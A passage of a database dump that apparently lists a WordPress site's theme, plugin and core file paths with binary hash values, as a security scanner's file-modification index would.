ueman/assets/front/img/demo/11-520x245.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>�zq���','#�g��Ԟ�W��Q���2v���*�%D��9','',0,'?'),('�S�1ox9�:��,��','wp-includes/wp-includes/block-patterns/text-two-columns.php',0,'��W�ۆe���9���!>','��W�ۆe���9���!>','bP9���ޤyP���g��\"��Ę��\"V�','',0,'?'),('�UA�;��,}����v�','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-item-setting.php',0,'���aER>60�.)H','���aER>60�.)H','�K-I���6A��,\\��nQ�P���&','',0,'?'),('�Z�N����\"��i~��A','wp-content/themes/pine/template-parts/content-portfolio-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bۓ8��F�i��\n �,','�W�%9f�ct����F-�ka��2��1k��','',0,'?'),('�]����Qt�.Z��$','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-select2-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�c���\0�p�s�','>�q{(�+fޙ`�=��a@��3bzܥа�l','',0,'?'),('�^ۛ�������F','wp-content/themes/twentytwenty/assets/css/editor-style-block-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H\0���8x��^��B','}߮�Y���+�H ܥ`�֒�#�ʅx�-�6','',0,'?'),('�o5���$J8Nn��','wp-content/themes/anima/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���z#��F��4�n��','9�����������60!ҋ�d,�ex��7','',0,'?'),('�pɄ�bq���dgf��','wp-includes/wp-includes/js/customize-selective-refresh.min.js',0,'E�G�埳6�0�b�','E�G�埳6�0�b�','G���i�A�w_�P�g�9����Oɓ��M�','',0,'?'),('�yz,c߬��Ӝ�VΫ','wp-content/themes/newsmag/footer.php',0,'�G����-H1LE���H','�G����-H1LE���H','xZ���y��Em5��5�x_�P�ꂙl��','',0,'?'),('�z^}��¤hh3\r��w','wp-content/plugins/wordfence/images/options.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��Ѵ����A�','D:�bw�#^����4�B�KIP�? z�n�V�_','',0,'?'),('䆮G*�~�5H���I','wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lS?,�ra�4;�^F','�D�;�䏑��eH�i�b�\Z�?�b����','',0,'?'),('�W���|���lP\Z��','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�#I}�Fw��<ſ�','�l��;�h�l���q���⋤�Q|V�Y��?�V-','',0,'?'),('䗦���L��z/��%','wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��2J娳�YB瘱�','\ZP�L㨒���Zi�t�A�������7d�','',0,'?'),('�������J���','wp-includes/wp-includes/theme-compat/embed-content.php',0,'�m\'牉�TeD�]pCA','�m\'牉�TeD�]pCA','J�ϑ߷�`�š+,��jr�#eQ�䫖 ���','',0,'?'),('��]m�<sUQ��@�','wp-content/themes/capacious/section-parts/section-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�E�ޙ��L�t�Z9','cѮ��}�F�����spD֡�Z��1\"��;ǰ��','',0,'?'),('����zpKC�{\\>��','wp-admin/js/dashboard.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VP�k��\Z��l(�','/S�\0�\\��T��Z��OL\\3aˑ���','',0,'?'),('���c�{�|%G�o�','wp-content/themes/hueman/content-featured.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','07a(2��s �Iv�','35 �����3�\"L����bd����x��\Z]z�','',0,'?'),('��l0 ���I��','wp-content/themes/auberge/template-parts/content-attachment-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+���4Q�i���]��','��_pgeB\r��\0�I����R��>-\Z,~','',0,'?'),('���1�]�M|�K�FZ','wp-content/plugins/wordfence/lib/wfBulkCountries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9 +Oyծ�urO�3�\n','X&o1\'�cg��ml��yS����t�����\r','',0,'?'),('�\00��q�ĊNy)��','wp-includes/plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�v/�M��;�7/N:','AI�OZl���wC�fj�@�r}���H!ѧ�Q','',0,'?'),('�ڰ���ק��L`','wp-content/themes/event/inc/front-page/front-page-features.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|�\\AƠ-��}�','�v�w�!W������\n��|��{�g�伏�&�','',0,'?'),('�\07m �\n\\[�R\'�+','wp-includes/wp-includes/sodium_compat/autoload.php',0,'uw�h[e��z�x��','uw�h[e��z�x��','wp�B��3K�r3_�!�}��b����d�v\r��','',0,'?'),('���5w�)��UhBH','wp-content/themes/advance/inc/kirki/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�`x�{��-ë�','��I�]D��.���.��]�G\0��(\0]?�','',0,'?'),('�\'�`F̔�~�Ė��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���؍��0�+C����','`>&i(Ź���C���f���&���>Y\"�','',0,'?'),('�+��i�aM�y�f��','wp-includes/wp-includes/widgets/class-wp-widget-recent-posts.php',0,'��d���j�F����3','��d���j�F����3','5���s� ��O>���{��ĩ�2�!�.�1��','',0,'?'),('�4����m�T曢�A','wp-content/plugins/wp-cerber/assets/flags/cx.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^�f��mW}}]�','db\'f-�LZ�\0g �]��_��\'���o','',0,'?'),('�C�Ǵ��k�q{.L','wp-includes/js/dist/block-serialization-default-parser.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NpʊW\0=�7xC�9','0�f��VZ]�]aD�%��\n̨\r�(��\\�B','',0,'?'),('�E}���p��Mp�D��','wp-content/themes/event/inc/widgets/widgets-functions/contactus-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gҦ�v|�^$U�op�','����?�\"u�J˴qf��*�G�\'�6�;','',0,'?'),('�H��4�.\\�:��#��','wp-admin/css/l10n.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+.�[H\rϬ.k��/ ','�������lg����j-u��\\$?���)\\�y6@','',0,'?'),('�M<61=�3|\0\"?���','wp-includes/wp-includes/js/dist/hooks.js',0,'�\'����ʣJ1�iz��','�\'����ʣJ1�iz��','*��F;���1Y#����W��ˈ���o���','',0,'?'),('�R��5?�- S�^H��','wp-admin/js/editor-expand.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K�\\(��p���[','���;W#�}Gj�[��K�SAKZ�iˤ[Q4c\n','',0,'?'),('�\\=NҎXfڸ\rg&� �','wp-includes/wp-includes/js/dist/blocks.min.js',0,'�F�2�~����CO�','�F�2�~����CO�',',f;��8`�=�[D�\n\\cA�O�Te�� ','',0,'?'),('�eŐ��n���A�','wp-content/plugins/wordfence/lib/wfView.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�ܺ�-ˆN\n�\\�nO','x�2Q����mk٫@IFRh�Hu~�R8�\"z�K4�','',0,'?'),('�e��)��\r�se','wp-includes/wp-includes/js/customize-preview-widgets.min.js',0,'�T-�6�P)H�=��','�T-�6�P)H�=��','����6ª�e����yмbdf}��5��','',0,'?'),('�nb\"�[���M �f��','wp-content/themes/advance/inc/kirki/includes/class-kirki-l10n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s>��pa��f]�{�m','�7/�x�+Cgn�#���J��\"MYB���s�','',0,'?'),('�wʼnZ��-��\n��r','wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�c�\Zම#\Z֭','��|N�\0��a69�A��1N�%+���','',0,'?'),('���5�1Q�?�_��','wp-includes/https-migration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s9�4W#2��!H�߾�','2�|P��Ł�muН���~k��37rz0�x�A�','',0,'?'),('囐�s���\Z��}��I','wp-content/themes/promote/inc/kirki/assets/js/controls/dimension.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����d�5|YY;3',' ��U�75�{/}�T�����?�b�bL_~pR��','',0,'?'),('���I<r�y�Y���','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php',0,'Y[�&A*zϦ/��?<�','Y[�&A*zϦ/��?<�','�������Dn��N����AU)n�J�','',0,'?'),('坑kU��Z@L+!+݈4','wp-content/themes/promote/inc/kirki/includes/output/property/class-kirki-output-property-background-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Puē���P��7�','Y�´���(��sK�{�!��J���j0�M�m���','',0,'?'),('峳$� @z6�\0`��/�','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ջ}��B��H��71','��\"�beTb�$�����\n���~�ln��','',0,'?'),('�٫T�K��Q,�$���','wp-content/themes/newsmag/assets/sass/site/primary/_posts-and-pages.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ǰo�H(0��Z�$���','~J��\n��={������:�`�#O$$�D�','',0,'?'),('��h�v���_EŮ���','wp-includes/wp-includes/class-wp-http-encoding.php',0,'Usg2eޫj9�EA����','Usg2eޫj9�EA����','t��1��XZ��C�9��c��x](D[9��O�','',0,'?'),('�ݡ��&����R�� �','wp-includes/wp-includes/blocks/table/block.json',0,'����̀)#\rS� ��','����̀)#\rS� ��','�q#�.Z!�g�l���讍T�\0�u�\'EA�?�','',0,'?'),('��O,�T�\\<�;I�','wp-includes/wp-includes/ms-files.php',0,'Z�]G���y��2D','Z�]G���y��2D','�Z�h�x�^�/������#���Z^N��_\Z','',0,'?'),('�\r�b\\��ɍ�\Z��','wp-admin/edit-form-advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-gP\" �P+Pg��h','����b�$磷#�6��Db˓���Z����4l(','',0,'?'),('�)�O���\'�{q��','wp-content/themes/showcase-lite/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X$C���\'�9x','�rGr� �]���e�c.������a���','',0,'?'),('�+���.��eF��','wp-admin/css/dashboard.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']��w.��Ş1->�QY','�}5�X_Kr�Oe�鎜��g�i�v��\Z8��','',0,'?'),('�/�P&aC2�!f2Z��n','wp-includes/wp-includes/js/underscore.min.js',0,' >��>��S����b�%',' >��>��S����b�%',' ʍ��LM> �ύ��5́kv��k�PHɇ0','',0,'?'),('�6�n��[l��vq','wp-content/plugins/wp-cerber/assets/flags/bl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�9e���kk�R�o���S','wp-includes/embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V\Z���/}ͳYM=��','6K�(|�/�R��̵�;$.�Jf8{�v�G�','',0,'?'),('�G��5�@����07��','wp-includes/images/blank.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʟg��h�kK��f','>��E�G��L�� E��JQ���|�B���ij�','',0,'?'),('�J~_o�f�k�����','wp-includes/js/wp-embed.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R%�qU�0�8}_��','ޚT�d����U�2#*_�D�WQT�n�I%Ǭ�','',0,'?'),('�O��ۆ��k��d4','wp-content/themes/gambit/template-parts/content-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ƃ�\\�R0T�\0ya','wW~��iF~:�H�p�l�\rG�$��TUO;��','',0,'?'),('�]>s��[�G�T)�y','wp-content/themes/weblog/acmethemes/hooks/footer.php',0,'^�EKi��R��&-��','^�EKi��R��&-��','�d��{c�]\"~Ǣ�v�u�P���=�j�O%','',0,'?'),('�c7>�i h�8�]M�B','wp-content/themes/spidermag/spidermag/customizer/social-section/social-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��~l��ާ��Ӫ�','���y,ƄTg��H�v;�\r�<�C\nn��','',0,'?'),('�n�^q8���2�L���','wp-content/themes/hueman/functions/init-retro-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UJnq;��a���\Z�','�I�����Ƽ]~�q�TW�S��?�]�4�Hjm','',0,'?'),('�yEPPt�k#X�','wp-content/themes/anima/resources/images/demo/1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�k�ˮV��\"�/��','�Y�a����3T�p�F�C��22��Nq]l','',0,'?'),('恴L�ޠe���/�u�','wp-content/plugins/wp-cerber/assets/scanner.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g#z���w���l\n\'�','�q��̇P�I��.K�{r�P��|��F\n�m','',0,'?'),('�,�$�|�W����','wp-includes/wp-includes/theme-compat/embed.php',0,'�Ţs�^��q�cb�','�Ţs�^��q�cb�','W���5T�p��;-�n��0�a����O\n��','',0,'?'),('�漢�����%����','wp-includes/wp-includes/js/dist/a11y.js',0,'�Ɲ���լިF��','�Ɲ���լިF��','��w���R�x��$�r�դɯ�D���`.��u','',0,'?'),('様��7�^�b�\"�','wp-content/plugins/wordfence/images/back_disabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h���g��i���>','�䏛N�7�g�?�Fb!}��ݿ��C��鳇','',0,'?'),('�y�l��s�U>�<��','wp-includes/css/customize-preview.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b���Sb�s��\"','ߌ��I�R�\\Ĺ�e��z3�QsC����Q�','',0,'?'),('����eҕ�h�V�\"�','wp-content/plugins/wordfence/views/options/block-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�PK���.ٳ�\r','�+�>�����U��a`.4m킳+����U','',0,'?'),('��W���\"���Sk:�','wp-admin/images/align-center-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-�r�5*J7�If','�8tf�*Jw�T�^��H�>���1�JD�ο','',0,'?'),('����P�IcD��ƾ�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����J�s��Ǚ�B','��ER��Jb�ȸI\"��t�],�qP�1\\fD','',0,'?'),('����x*�ñ�U���','wp-includes/block-patterns/two-images.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��_�w?V�:�g��C','w@�c|�h�(��Hz�X[�_�:�x��0�)K','',0,'?'),('�⣣�M�O����U�','wp-admin/js/editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����I=k\Z���','�\\\\^�*k,;�_4�\'� oiU��@&e��','',0,'?'),('���\"�LJ1�C4ND�','wp-content/plugins/wordfence/views/scanner/issue-wfPluginAbandoned.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0ӝ�w�Yh�,�*�','�`c��LX����6��Im � B�]se��f�','',0,'?'),('��(���E�U(ʃ','wp-includes/wp-includes/ID3/module.tag.lyrics3.php',0,'~w�\"[�װ���A�>A','~w�\"[�װ���A�>A','�V*��&)��~��d�}K�,����E�s�','',0,'?'),('���ӹ��`3�\n@ͅ4','wp-content/themes/weblog/acmethemes/hooks/slider-selection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x>̕^-����','�[V�!�AF\Z�\r�#{ �y6xE�/\n<�0��','',0,'?'),('���;�W����l�','wp-includes/js/dist/deprecated.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>�H7� �UR','\r�d�����۠c��Lf�z�#j�5E�Q�ޝ','',0,'?'),('�]:]6Q(s-�B��','wp-content/plugins/wp-cerber/assets/flags/so.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9�:�vU:{��','I���˱�� -���f�rǏc�k��@�3�` =','',0,'?'),('�\n`m�H�I�i�M�','wp-content/themes/twentynineteen/inc/color-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�4�\Z���M��y','_{��g�g�|n�%�e��~�����sCi���B','',0,'?'),('�\"�ơ���7vs+�','wp-admin/includes/class-pclzip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9MY�^mluRg','\0\rhV!\Z7\Z�虁�K`2�_\\H ��G\n�;=','',0,'?'),('�Djמ�8]fД_�','wp-includes/class-wp-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�� �B��Ի��','���/�����0�=�|{h��n�R�','',0,'?'),('�GeƧ����tn%��T','wp-includes/wp-includes/js/codemirror/jsonlint.js',0,'I)fy��kT�+��<՟','I)fy��kT�+��<՟','�$D;;����0���F�~p��GғF�ˁ��','',0,'?'),('�T�|h0l�-v}h�Z','wp-includes/wp-includes/js/dist/html-entities.js',0,'���2�@؇\0����)','���2�@؇\0����)','�_Z�#W�șf�X���c�B���`��dQfH�,','',0,'?'),('�Z���L&;@ÇUS��;','wp-content/themes/auberge/assets/css/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<v��D�lpu%�/�֔','�����)A ��t�S��fUB�2�Ė�\n���','',0,'?'),('�b`K�\'��컜���K','wp-includes/functions.wp-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|�4ؒT�$�0B-�','x�89@��G��#���G�b}y\'�A����v','',0,'?'),('�e����s|��0d����','wp-content/themes/anima/resources/images/demo/6.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�?�]F�s=�����#�','CF�CbX���C��r����w]��w�@��=��','',0,'?'),('�iY!m�y�W�׃�','wp-content/themes/pine/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����U\n.�[�mq�','~�TH\';�MpήZ�nl$��N���5~J����','',0,'?'),('�u��<����~-\'��','wp-content/themes/advance/js/unminified/wow.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��\Z�%�\\C>|\Z�','w�;,�Yný럢[vp��yј2\"����O�','',0,'?'),('�x�Δ)NX3u/@�4Y�','wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N���>�EH�I��� �','u).H����� �����C���HsԐ`$�','',0,'?'),('�J��ёe�\rXd��$�','wp-includes/class-wp-customize-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,���^Oި�����','�K�WC�-�v�l�w� ��R\Z�xS)[R�','',0,'?'),('�ҘG\"��:0�\\�KH#','wp-content/themes/twentytwentyone/assets/sass/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CUZJ�k�\r=�q\'��','Pc����:�D3yN�o&�t*Ѱ�[��:kG\'�','',0,'?'),('碝i\Z�����u.�|�','wp-includes/wp-includes/blocks/video/block.json',0,'�4�P=C�g �\'L�','�4�P=C�g �\'L�','g��G�a$�E������˘UQbyħ�+','',0,'?'),('�%-�+(�묖���','wp-includes/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php',0,'\"�2s7��\\�i#��E','\"�2s7��\\�i#��E','a������t��W�� �3N�\Z��`x�hI�`�','',0,'?'),('�$@Y���w5�_ k','wp-content/themes/spidermag/spidermag/customizer/preloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˽��-!p����0�i�','���\rp�^洱5\0��C�*)0�\'[�z�����','',0,'?'),('�+�뿨\'�)��','wp-includes/wp-includes/js/swfupload/license.txt',0,'��[�`�^�-�o�QWz','��[�`�^�-�o�QWz','��:)��6�a\"3r��\rP\rN�4�yJ�ַ��U�q','',0,'?'),('�.Kѐ\\\'��y<��','wp-content/themes/travel-stories/font/Open-Sans-Regular/opensans.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����1��j_e�@c)','�Y)����|�v��r�âP�y�#I/�','',0,'?'),('���K�g���o#�0','wp-activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�#w:m���2��A\"','���^>�*���r���I+��{�ф�U�b�&�','',0,'?'),('�ʼn� i��/Э','wp-includes/formatting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H(@q���Tj��','�g��\n?#��\'^�\'d�8�\Zi��=\Z������','',0,'?'),('��H���l��{!D#�!','wp-admin/js/color-picker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�pgG��&�3�,�','S����<�`�J��=�4mS�\"kY��Mׂҡ�','',0,'?'),('���L�.dDv��','wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�0�j8�2\n�s�','v��\\qY{S��<|+��{�(m��?)��D�=�','',0,'?'),('��F�ZY��C8��3E','wp-admin/css/colors/blue/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��ٳ���v�2.','�ڷ���Rkd�NZ��h��V�\r�<p���=1','',0,'?'),('��M�����n�$hK�?','wp-content/themes/newsmag/inc/admin/welcome-screen/js/welcome.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5\0tDx�PRd��<5','�Q�{���)}#��O�@��\\u>l���YՅ','',0,'?'),('��sF�um���Ą��','wp-content/themes/weblog/sidebar-left.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���i�VJ\0\'֟��,','z�E3�!3��wS|� ��ήY@q�U\n�*1G','',0,'?'),('���C5�6o��2��','wp-includes/wp-includes/blocks/latest-comments.php',0,'��j��c\r9+@/K<�2','��j��c\r9+@/K<�2','=�\n+rS�D;��|�Y}�VĒP[�o =]LJ','',0,'?'),('��}�Woc�x�J�7��','wp-content/themes/advance/inc/kirki/includes/lib/class-aricolor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u>�B���m��}��5�','��7\n�DQ��Kx���o%�&)�b�@;�e��ö','',0,'?'),('��÷�g$�M�s�','wp-content/plugins/wordfence/views/waf/option-rate-limit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)YMˍ�\\Ξ��\'','*�eG�P$����б�աmw&��:OL/1>N','',0,'?'),('��XB��A���~�','wp-includes/wp-includes/css/dist/nux/style.min.css',0,'��cڷ�\r�\\Kn]\nO�','��cڷ�\r�\\Kn]\nO�','h��iu���E���UJc]���\\d`M\Zqi �սq','',0,'?'),('�%y�>}H�o��(6','wp-includes/js/jquery/ui/core.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�g{����!�S{5�','�e��%�h�\\f���軙tuv�����R','',0,'?'),('�>7�J-[�Y�\0OB4^','wp-content/themes/hueman/assets/czr/css/img/grey@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�R�%@�6Z��,','i.I��E�^�3���Ƶ��9n�&YA','',0,'?'),('�SHLenP�q7�č�','wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�����`�j|��y�','i��OGi����F|4�8��V��j�\n#V-L','',0,'?'),('�f�i�`�=@T��o�','wp-admin/images/spinner.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�\nD�\n�oً�j˲�','zƄ�\Z\"��n\Zs�(�U�/~�7��F��^
�','',0,'?'),('�n`�5� �\n0�R�a','wp-content/themes/sg-window/genericons/genericons/Genericons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s/�n]�d���z�?','�*���SW����.��~5t�=���V�p̦�','',0,'?'),('�wj0��67���@�T','wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�2s7��\\�i#��E','a������t��W�� �3N�\Z��`x�hI�`�','',0,'?'),('�J���y��0m�`�/','wp-includes/class-IXR.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0���C`q�x�',']���z�p��q�N\"CKW��鴛��c��M','',0,'?'),('�B���a,�����','wp-content/themes/Kent/searchform.php',0,'�t��>�xC�: ��v','�t��>�xC�: ��v','dh=��Q4\'�h?;u�&\'�ŗ��EdA5','',0,'?'),('艚Ank��:�e\'ݖA','wp-content/themes/anima/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��|��@�)��J#','$��4�#�m Lno2u���\\2I���-�`�p','',0,'?'),('�Ò���/���?��k','wp-includes/wp-includes/images/smilies/icon_exclaim.gif',0,':\\��>5�\0r���sg�',':\\��>5�\0r���sg�','�L�ɵ�H��A(�xʓ2�EP%� ��#���#�5','',0,'?'),('�\0�]�p��ޑ� \rG','wp-admin/css/customize-nav-menus.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����+�D�8rnlU��','�U����2��#d�{���3��E8���U�','',0,'?'),('��00Us�\0m��V�9','wp-includes/wp-includes/js/dist/vendor/lodash.js',0,'2n�B2���]�� �','2n�B2���]�� �','\"��Qe��\\NJhb�Bj�{i�J\n�Қi;eZ�3','',0,'?'),('�+�S��dS�\\ݠ','wp-content/themes/event/inc/js/customizer-custom-scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VO����]���V{\r','�\n�Ϭ���b�s���QȨ-}$��1��h�','',0,'?'),('�$l��z��!','wp-includes/wp-includes/js/jquery/ui/effect-transfer.js',0,'OԩN��i���1','OԩN��i���1','Ł\0p�,�\\�!ON)�Q���Xl ��k�s�l�','',0,'?'),('��njg^ :�s�A�&','wp-includes/wp-includes/Requests/Exception/HTTP/412.php',0,'%��Iܷ��=�7��V�','%��Iܷ��=�7��V�','S�A�4c\\D�56-��#��d*���ҽӾ�R���','',0,'?'),('��Dg�[�])-Ϟ�\r','wp-content/themes/newsmag/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��݁@T~��f��','�&��ı�ÒM�)\r��9]�������o�','',0,'?'),('���\0�O�7�7t���{','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php',0,'���m3�E�?��՛','���m3�E�?��՛','0pU��Ĭ���h���C�r+���˞I�{-qA�','',0,'?'),('���\n��`�|�\Z��՜','wp-content/themes/maxbusiness/images/brands/brand4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+�����C��P�@','4�:�����oa��&r�b����<��ɀM��','',0,'?'),('��tU;�56|�4Ql','wp-content/plugins/wp-cerber/assets/select2/dist/js/select2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|Ԋ2�3�\\�:=�','�� �<�(*Wv���Ћtw��r_��t�i� ','',0,'?'),('��v�w\n�s�̨H5�','wp-content/plugins/all-in-one-wp-security-and-firewall/js/password-strength-tool.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\ZNj�ک&��U��','B+1�E��}�n�7\Z�z�_��Q�̻�3�&','',0,'?'),('��21\'=P�σ�.��','wp-content/themes/event/inc/front-page/our-testimonial.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p۬�笩4�8��e','ܦ�Vc��#?e����S��e��i��G�U��','',0,'?'),('���W����:��]','wp-includes/js/dist/primitives.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','աV�?�ѴV{�#�M','=W�X��\r�6�l;��h����)H�C�dx','',0,'?'),('��V�>��d��O�d','wp-includes/wp-includes/js/jquery/jquery.form.min.js',0,'܉l�Ȍ��*��D�','܉l�Ȍ��*��D�','zt�O1� =2X����Q���_�y �}Z\r','',0,'?'),('���Q�o�H*���(�','wp-content/plugins/wordfence/images/sort_asc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��I��+ƾ��=��','d�C�T�����e&,)Ѵ��FG�\Zd�ON�','',0,'?'),('�+����3�pU','wp-content/plugins/wordfence/lib/wfOnboardingController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�%�̍��ų�<��','ŔWF&�x\Z �\"�g��ߠ���;�=�D�ٗx','',0,'?'),('�\"�e��AlB�E�/','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vh�lZ��.�]m`q��`','Ȧ(�{r�E�(ug�_ ܹ k��\rP�`�8�c�','',0,'?'),('�(��v/���&��C)','wp-includes/wp-includes/js/jquery/ui/effect-shake.js',0,'�;5�_������ƽ\"�','�;5�_������ƽ\"�','�$D���IAXF����wH�YO�J3�K��','',0,'?'),('�D�C5 